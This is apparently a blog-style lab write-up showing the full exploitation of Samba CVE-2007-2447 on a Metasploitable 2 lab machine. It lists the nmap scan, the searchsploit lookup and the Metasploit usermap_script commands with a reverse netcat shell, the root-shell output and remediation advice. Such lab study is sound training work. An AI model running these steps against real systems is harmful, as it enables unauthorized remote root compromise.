Introduction
Samba is a service that runs on the SMB (Server Message Block) protocol, used for file sharing and printer access across a network. CVE-2007–2447 is a remote code execution vulnerability caused by unsanitized input in Samba's username map script feature. An attacker can inject malicious commands through a crafted username, which are executed at shell level — giving root access directly.
Lab Setup
Attacker: Kali Linux — 192.168.254.128
Target: Metasploitable 2–192.168.254.129
Methodology: Reconnaissance → Enumeration → Vulnerability Identification → Exploitation → Post-Exploitation
Step 1: Scanning & Enumeration
nmap -sS -sV -n -Pn -T4 --top-ports=100 192.168.254.129I used -sS to stay stealthy, -sV to detect service versions so I could research vulnerabilities, -Pn to skip host discovery since I already knew the target was up, and -T4 to speed things up. The goal was to map the attack surface as quietly and efficiently as possible.
Key findings:
- Ports 139/tcp and 445/tcp open
- Service: Samba smbd version 3.0.20
Step 2: Vulnerability Identification
searchsploit samba 3.0.20I used searchsploit — an offline terminal tool that searches the Exploit-DB database locally — so I could quickly find known exploits without needing internet access. Think of it as the intelligence report. It told me the vulnerability existed. Now I needed the weapon to exploit it.
Result: CVE-2007–2447 — username map script command execution. Unsanitized input in Samba's username map script allows an attacker to inject malicious commands through a crafted username and execute them remotely.
Step 3: Exploitation
Where searchsploit is the intelligence report — Metasploit is the toolkit.
msfconsole
I searched samba usermap because that keyword came directly from the searchsploit result. One module came back ranked excellent — stable and reliable.
use exploit/multi/samba/usermap_script
show options
Metasploit automatically selected cmd/unix/reverse_netcat as the payload. Netcat sits on my machine listening on port 4444, waiting to catch the shell when the target connects back.
set RHOSTS 192.168.254.129
set LHOST 192.168.254.128- RHOSTS — the target
- LHOST — my machine, where the reverse shell lands
Why reverse shell? Firewalls block incoming connections — but outgoing ones are usually allowed. So instead of me connecting to the target, I make the target connect to me. Firewall bypass, built in.
Port 139 was targeted because both machines are on the same local network — SMB over NetBIOS.
run
Step 4: Gaining Access
Command shell session 1 opened
192.168.254.128:4444 → 192.168.254.129:32901The exploit fired. The target connected back to my machine on port 4444 exactly as expected — the arrow in the output showing the target reaching back to me, not the other way around.
Step 5: Post-Exploitation
whoami → root
id → uid=0(root) gid=0(root)
uname -a → Linux metasploitable 2.6.24-16-server
I ran these three commands to confirm what level of access I had. I expected to need privilege escalation — but I didn't. Samba was running as root on the target system, so exploitation gave me the highest level of access immediately. No extra steps needed.
That's what makes unpatched services so dangerous. It's not just about getting in — it's about what's waiting for you when you do.
Remediation
- Update Samba to the latest version
- Disable the username map script feature if not required
- Restrict SMB ports 139 and 445 via firewall
- Disable NetBIOS if not needed on the network
- Never run services as root unless absolutely necessary
Conclusion
This lab shows the full attack chain — from a simple Nmap scan revealing an open port, to searchsploit identifying a known CVE, to Metasploit delivering a root shell. The scary part isn't the exploit itself — it's how fast it happens on an unpatched system. One open port. One outdated version. Full root access in minutes.
Author: Ume-Habiba